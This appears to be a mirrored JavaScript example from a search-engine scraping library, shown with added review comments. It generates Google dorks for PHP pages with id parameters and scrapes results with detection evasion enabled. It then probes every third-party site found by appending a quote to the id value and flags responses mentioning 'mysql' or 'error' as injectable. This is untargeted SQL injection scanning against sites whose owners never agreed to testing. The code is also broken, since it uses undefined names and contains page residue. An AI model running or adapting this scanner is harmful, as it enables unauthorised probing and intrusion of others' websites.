mirror of
https://github.com/NikolaiT/se-scraper.git
synced 2025-01-27 06:38:34 +01:00
103 lines
3.1 KiB
JavaScript
103 lines
3.1 KiB
JavaScript
|
|
/*
 * Do not run this, this is probably illegal in your country ;)
 */
|
|
|
|
const se_scraper = require('./../index.js');
|
|
|
|
|
|
// generate some google dorks
|
|
|
|
/**
 * Build a list of search-engine query strings of the form
 * `inurl:"<page>.php?id=<n>"`.
 *
 * For each of the page names 'seite', 'inicio' and 'index' (in that order),
 * `iter` queries are produced, each with a random integer id in [0, 99].
 *
 * @param {number} [iter=4] - number of queries to generate per page name
 * @returns {string[]} the generated queries, grouped by page name
 *     (3 * iter entries; empty when iter is 0 or negative)
 */
function genGoogleDorks(iter=4) {
    const pageNames = ['seite', 'inicio', 'index'];
    const queries = [];
    for (const pageName of pageNames) {
        for (let i = 0; i < iter; i++) {
            // Math.random() is in [0, 1), so the id is an integer in 0..99.
            const id = Math.floor(Math.random() * 100);
            queries.push(`inurl:"${pageName}.php?id=${id}"`);
        }
    }
    return queries;
}
|
|
|
|
// Generate the query list once at startup and print it for inspection.
const lulz_keywords = genGoogleDorks();
console.log(lulz_keywords);
|
|
|
|
|
|
// Browser-level options. According to the original note these need to be
// provided on startup and cannot be given to se-scraper per scrape() call.
// NOTE(review): this file passes the object as the first argument of
// se_scraper.scrape() — confirm how the library treats it.
let browser_config = {
    // if random_user_agent is set to true, a random user agent is chosen
    random_user_agent: true,
    headless: true,
    // how much debug information should be printed
    // level 0: print nothing
    // level 1: print most important info
    // ...
    // level 4: print everything, including details nobody usually needs
    debug_level: 1,
    is_local: false,
    throw_on_detection: false,
    puppeteer_cluster_config: {
        headless: true,
        timeout: 2 * 60 * 1000, // max timeout set to 2 minutes
        monitor: false,
        // The original comment here read "one scraper per tab".
        // NOTE(review): presumably a puppeteer-cluster concurrency mode given
        // as a raw number — verify that 3 is the mode actually intended.
        concurrency: 3,
        maxConcurrency: 4, // scrape with 4 tabs
    }
};
|
|
|
|
// Entry point: an immediately-invoked async function that
//   1. builds a per-call scrape configuration (lulz_config),
//   2. awaits se_scraper.scrape(browser_config, lulz_config),
//   3. collects the `link` of every result entry into all_links and prints it,
//   4. requests each collected link with a single quote appended after every
//      `id=<digits>` occurrence and logs a message when the response body
//      contains the substring 'error' or 'mysql'.
//
// WARNING(review): step 4 sends modified requests to third-party hosts taken
// from search results. Only ever point code like this at systems you have
// explicit permission to test.
//
// NOTE(review): the `|` lines throughout this block are residue from the page
// this file was extracted from; they are not valid JavaScript.
(async () => {
|
|
// scrape config can change on each scrape() call
|
|
let lulz_config = {
|
|
// which search engine to scrape
|
|
search_engine: 'google',
|
|
// an array of keywords to scrape
|
|
keywords: lulz_keywords,
|
|
// the number of pages to scrape for each keyword
|
|
num_pages: 3,
|
|
// how long to sleep between requests. a random sleep interval within the range [a,b]
|
|
// is drawn before every request. empty string for no sleeping.
|
|
sleep_range: '',
|
|
// path to output file, data will be stored in JSON
|
|
output_file: 'goodboys.json',
|
|
// whether to prevent images, css, fonts from being loaded
|
|
// will speed up scraping a great deal
|
|
block_assets: true,
|
|
// check if headless chrome escapes common detection techniques
|
|
// this is a quick test and should be used for debugging
|
|
test_evasion: false,
|
|
apply_evasion_techniques: true,
|
|
// log ip address data
|
|
log_ip_address: false,
|
|
// log http headers
|
|
log_http_headers: false,
|
|
};
|
|
|
|
let results = await se_scraper.scrape(browser_config, lulz_config);
|
|
|
|
const all_links = [];
|
|
|
|
// Flatten the scrape output into a plain list of links.
// assumes results is keyed by keyword, then by page, and that each page entry
// has an iterable `results` whose items carry a `link` — TODO confirm against
// se-scraper's output format
for (var kw in results) {
|
|
for (var page in results[kw]) {
|
|
for (var res of results[kw][page]['results']) {
|
|
all_links.push(res.link);
|
|
}
|
|
}
|
|
}
|
|
|
|
console.log(all_links);
|
|
|
|
// Requests are awaited one at a time, in the order the links were collected.
for (var link of all_links) {
|
|
try {
|
|
// NOTE(review): `got` is not required or defined anywhere in the visible
// source, so this call would throw a ReferenceError (caught below).
const response = await got(link.replace(/(id=\d+)/g, "$1'"));
|
|
let html = response.body;
|
|
// Plain substring match on the body; this is a loose heuristic, not proof
// of anything about the target.
if (html.includes('error') || html.includes('mysql')) {
|
|
// NOTE(review): `url` is not defined anywhere in the visible source; the
// loop variable in scope here is `link`.
console.log('Got a mysql injection in ' + url);
|
|
}
|
|
} catch (error) {
|
|
// NOTE(review): `error.response` is dereferenced without a check; an error
// that has no `response` property makes this line throw in turn, which would
// reject the surrounding async function.
console.log(error.response.statusCode);
|
|
}
|
|
}
|
|
|
|
})(); |